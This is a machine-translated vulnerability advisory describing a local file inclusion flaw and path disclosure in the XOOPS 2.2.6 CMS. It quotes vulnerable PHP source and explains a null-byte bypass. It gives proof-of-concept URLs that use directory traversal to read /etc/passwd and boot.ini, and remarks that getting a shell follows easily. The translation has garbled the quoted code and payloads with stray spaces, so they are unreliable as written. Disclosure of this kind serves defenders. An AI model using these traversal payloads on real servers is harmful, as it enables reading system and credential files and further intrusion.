XOOPS 2.2.6. local include vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200925177
Type myhack58
Reporter 佚名
Modified 2009-11-02T00:00:00


Author: Oldjun

Casual encounter with this foreign CMS system: XOOPS 2.2.6, google the next, version old, and didn't find any known vulnerability, so the following source code yourself to see, still haven't found what you can use, but saw a couple of tasteless, so.

XOOPS is a web application platform written in PHP for the MySQL database. Its object orientation makes it an ideal tool for developing small or large community websites, intra company and corporate portals, weblogs and much more. (Reference : http://www.xoops.org).

  1. Local File Inclusion Vulnerabilities: The

/ works with: magic_quotes_gpc = Off /

Now can encounter this php configuration, simply can go to buy a lottery ticket, so be tasteless.

Local File Include vulnerability found in scripts: modules/system/admin.php

See the source:

<? php if (isset($_POST['fct'])) { $fct = trim($_POST['fct']); } if (isset($_GET['fct'])) { $fct = trim($_GET['fct']); } $xoopsOption['pagetype'] = "admin"; include "../../mainfile.php"; //Use when you need to be registered user and login if (!$ xoopsUser) { redirect_header(XOOPS_URL."/ user.php", 3, _AD_NORIGHT); } include XOOPS_ROOT_PATH."/ include/cp_functions.php";

the include_once XOOPS_ROOT_PATH."/ modules/system/constants.php"; $error = false; if (isset($fct) && $fct != ") { if (file_exists(XOOPS_ROOT_PATH."/ modules/system/admin/".$ fct."/ xoops_version.php")) {

if (file_exists(XOOPS_ROOT_PATH."/ modules/system/language/".$ xoopsConfig['language']."/ admin/".$ fct.". php")) { include XOOPS_ROOT_PATH."/ modules/system/language/".$ xoopsConfig['language']."/ admin/".$ fct.". php"; } elseif (file_exists(XOOPS_ROOT_PATH."/ modules/system/language/english/admin/".$ fct.". php")) { include XOOPS_ROOT_PATH."/ modules/system/language/english/admin/".$ fct.". php"; } include XOOPS_ROOT_PATH."/ modules/system/admin/".$ fct."/ xoops_version.php"; ... ?>

If magic_quotes_gpc is disabled, it's possible to control the "$fct" variable content and inject an arbitrary filename (followed by a NULL byte (%0 0) to make file_exists() function to ignore the following "/xoops_version.php"), resulting in file content inclusion in application response.

Construct the fct, the basic if gpc is off, get the shell is not a problem.

Example: http://[server]/[installdir]/modules/system/admin. php? fct=../../../../../../../the boot. ini%0 0 http://[server]/[installdir]/modules/system/admin. php? fct=../../../../../../../etc/passwd%0 0

  1. Path disclosure:

Many files are direct access can be leaked path: /class/uploader.php /class/theme.php

In fact, the gpc is off, there is the first vulnerability can be scored, but gpc is off, too hard, tasteless tasteless.

Want to say about is the XOOPS system as a whole is still very safe, I see this version is already old enough, but security was never sloppy, milw0rm search the XOOPS system problems are basically modules, the various modules may have problems, but the main system didn't~